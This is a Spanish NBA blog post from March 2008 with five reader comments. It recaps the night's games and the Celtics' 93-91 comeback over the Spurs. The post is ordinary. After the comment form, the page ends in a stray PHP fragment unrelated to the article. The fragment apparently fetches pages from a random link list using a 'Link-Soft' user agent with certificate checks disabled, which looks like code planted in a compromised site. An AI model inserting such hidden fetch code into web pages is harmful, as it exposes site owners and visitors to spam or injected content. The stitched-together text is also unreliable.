Celtics vs Spurs y otras hierbas

18 de March de 2008 por Viva_Dirk

El Spurs-Celtics de anoche acaparó la atención de los espectadores y también la de nuestra crónica de la jornada. Pero antes, empezamos con un vídeo de resumen de los partidos jugados la pasada madrugada.

La crónica: cp3gooden

La jornada de ayer nos dejó 8 partidos, algunos de ellos sin apenas interés como la victoria de Indiana sobre los Knicks por 110-98 gracias a los 36 puntos de Mike Dunleavy, el triunfo de Memphis con 21 puntos de Navarro y doble-doble de M. Miller y Milicic frente a Charlotte 98-80 o un nuevo doble-doble para Al Jefferson en la victoria de los Wolves sobre Clippers por 99-90. También hubo duelos entre equipos medio-altos del Este como la victoria de Atlanta sobre los Wizards por 105-96 gracias a los 58 puntos de su trío exterior y un 12-15-6 de Al Horford; la exhibición del trío de Orlando con 62 puntos y 26 rebotes para ganar por 104-90 a los Cavs de LeBron; y los lógicos triunfos de Utah frente a Toronto por 79-96 con 47 puntos del banquillo de los de Sloan, y Hornets frente a Chicago por 97-108 contando con un estratosférico Chris Paul que acabó con 37-13.

Pero todo esto se queda en minucias cuando hablamos de un duelo como el que nos ofrecieron ayer San Antonio y Boston, porque si los Rockets con sus históricas 22 victorias seguidas son los líderes del Oeste y el equipo más en forma de la competición, los Celtcis siguen siendo la franquicia con mejor balance.

manulayscelticsLo que podria ser perfectamente la próxima final de la NBA nos dejó ayer un partido intenso, duro y brillante. Los de Boston tuvieron que remontar después de un desastroso primer cuarto en el que fueron aplastados por 28-11, con unos Spurs que acumulaban un 12 de 19 en tiros en ese periodo, mientras Boston presentaba un escandaloso 4 de 17 en sus lanzamientos. El partido parecía estar completamente dominado por Duncan y Ginóbili.

El 2º cuarto comenzaba con dos triples de San Antonio y ponía en 22 puntos la ventaja de los texanos, mientras los Celtics sólo encontraban para reaccionar a Paul Pierce y Sam Cassell, que anotaron 16 puntos en 6 minutos para dejar el marcador en 41-27. Acto seguido, Garnett mantuvo la diferencia con 6 puntos consecutivos, y entre Cassell y Rondo contestaron a Ginóbili para llegar al descanso con 53-43.

En el inicio del tercer cuarto Rajon Rondo y Pierce revolucionaron el partido, el primero con una inteligentísima defensa sobre Parker y descaro en ataque, y ‘The Truth’ con un triple al contraataque que provocaba el tiempo muerto de Popovich, tras el cual el parcial aún llegó a 15-2 para Boston. Tras este arranque Rondo siguió siendo el motor de los verdes anotando, asistiendo y defendiendo. Idéntico papel interpretaba Ginóbili para San Antonio, conppiercefinley lo que se llegó con 70-68 al último cuarto.

En el cuarto decisivo aparecía Horry con 5 puntos en los primeros 4 minutos, lo que San Antonio aprovechaba para irse por 6 en el marcador ya que Boston erró 3 de sus 4 intentos de canasta. Los puntos llegaban con cuentagotas, gracias en parte a que Duncan marcaba su territorio con 2 tapones consecutivos y en ataque se les acababan las ideas a los actuales campeones. Pierce tomó el mando de las operaciones a 5 minutos para el final, anotando 9 puntos en este tiempo y siendo el corazón de estos Celtics, apoyado por sus bases y los aleros de banquillo en ataque y ahogando al rival en defensa. Esto sucedía en la cancha mientras en la banda Popovic y Rivers no paraban de hablar con los árbitros. Todo pudo irse al traste con un mal pase de Garnett a Rondo que interceptó Bowen y que esta vez no pudo anotar Horry, cuando algunos ya estábamos previendo una nueva aparición de ‘ese extraño elemento’. El lanzamiento no entró y la victoria voló a Boston por 93-91.

Finalizamos con las 10 mejores jugadas de la noche:

 

Comenta

5 comentarios a esta entrada

  1. MagicJohnson32 dice:
    #1

    Dos palabras: año par.

      Citar

  2. Jabho dice:
    #2

    Pues Boston, con PJ y sobretodo Cassel, me parecen ya clsrisimos candidatos en el Este. Detroit no lo veo a asu altura y solo Cleveland, Lebron, puede darnos un susto. Si las lesiones respetan a la plantilla debe haber final.

    En el Oeste y con año par mi candidato es… Spurs. Estan en una fase regular pero aun es marzo. Aunque aqui la regular y como queden los emparejamientos es clave….

      Citar

  3. MagicJohnson32 dice:
    #3

    Pues para mí el Oeste es cada vez más una lotería. Los 8 equipos que acaben entrando la pueden liar, los ocho sin excepción.

      Citar

  4. Olafur dice:
    #4

    Estoy con Mordaunt, de que Celtics huele cada vez más a candidato único en el Este. Respecto a el Oeste ojo a la posible desintegración púrpura salvo que vuelva ya Gasol, que le puede hacer perder el factor cancha, aunque la verdad cualquiera pronostica en el Oeste juas juas

      Citar

  5. MagicJohnson32 dice:
    #5

    Pero es que casi que me dará igual el factor cancha si Lakers llega sano a los playoffs, con Gasol y Bynum en condiciones.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>